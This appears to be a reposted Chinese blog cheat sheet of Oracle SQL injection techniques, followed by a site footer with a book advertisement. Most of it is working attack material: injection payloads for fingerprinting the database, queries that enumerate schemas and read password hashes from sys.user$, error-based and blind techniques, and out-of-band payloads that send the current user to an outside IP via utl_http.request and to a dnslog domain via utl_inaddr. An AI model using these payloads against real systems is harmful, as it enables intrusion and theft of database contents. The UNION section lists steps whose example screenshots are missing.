SQL注入小结(Oracle)

内容简介：decode(条件，值1，值1结果，值2，值2结果，。。。值n，值n结果，默认值)条件和那个值相等就返回那个值的结果instr(字符串，子串)

0x00 判断数据库类型

Oracle有一些自带的表：dual、user_tables

id=45 and (select count(*) from user_tables)>0--
id=45 and (select count(*) from dual)>0--

利用自带的一些函数：譬如utl_http.request 这些
利用Oracle的字符连接符：CHR(97)||CHR(110)||CHR(100)||CHR(32)||CHR(49)||CHR(61)||CHR(49)

0x01 基本信息获取

查看sid
```
select instance_name from v$instance;
```

查看数据库版本：

select banner from v$version where rownum=1;
select banner from sys.v_$version where rownum=1;

查看用户：

select user from dual; --当前用户
select username from user_users; --当前用户
select username from all_users; --查看所有用户
select username from dba_users; --查看所有用户(需要有权限)

查看当前用户角色：
```
select role from session_roles;
```

查看数据库用户名和密码：

select name, password, astatus from sys.user$; --需要权限

通过注入获取数据

--列database
select global_name from global_name;
select sys.database_name from dual;
select name from v$database;
select instance_name from v$instance;
--列owner
select distinct owner from all_tables;
--列owner的tables
select table_name from all_tables where owner='UTEST';
--列tables的columns
select column_name from all_tab_columns where table_name='TUSER';
select column_name from all_tab_cols where table_name='TUSER';


--列tablespace
select tablespace_name from user_tablespaces;
--列tablespace的tables
select table_name from user_tables where tablespace_name='DB_TEST_DATA';
--列tables的columns
select column_name from user_tab_columns where table_name='TUSER';

0x02 UNION query注入

存在注入
判断列数
尝试union select 依次判断字段类型(下图判断出第二个字段是字符型)
得到表名
得到表的个数得到第一个表的表名得到第二个表的表名
得到第一个表的字段
得到第一个表的数据

0x03 error-based注入

ctxsys.drithsx.sn
dbms_xdb_version.checkin
dbms_xdb_version.makeversioned
dbms_xdb_version.uncheckout
dbms_utility.sqlid_to_sqlhash
utl_inaddr.get_host_name(在11g以后需要是超级用户或已授予网络访问权限的用户才能使用)

0x04 boolean-based blind注入

decode

decode(条件，值1，值1结果，值2，值2结果，。。。值n，值n结果，默认值)

条件和那个值相等就返回那个值的结果 SQL注入小结(Oracle)

instr

instr(字符串，子串)

从一个字符串中查找指定子串的位置，这里一直将位置置为1 SQL注入小结(Oracle)

0x05 无回显注入

web服务接收结果

select * from utest.msg where id=2 and 1=utl_http.request('http://59.108.35.198:8888/'||(select user from dual));

dns服务接收结果

select * from utest.msg where id=2 and (select utl_inaddr.get_host_address((select user from dual)||'.dnslog.wyb0.com') from dual) is not null;

Reference(侵删)：

以上所述就是小编给大家介绍的《SQL注入小结(Oracle)》，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对码农网的支持！

查看所有标签

猜你喜欢:

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

总开关

[美] 吴修铭 / 顾佳 / 中信出版社 / 2011-8 / 49.00元

当收音机经历从真空管收音机到半导体收音机，再到电晶体收音机的发展升级时，人们觉得自己的资讯来源美满得无可复加了。当约翰.洛吉.贝尔德发明了电视以后，在很长一段时间内，人们都认为电视就是他们所拥有的﹑也是所愿意拥有的最好的资讯媒介。时至今日，互联网的震撼不亚于以往任何媒介，它给我们带来了最大的信息量，最便捷的自我表达，最迅速的沟通。互联网似乎比以往任何媒介都具有优越性。在互联网成为这个时代主......一起来看看《总开关》这本书的介绍吧!

码农工具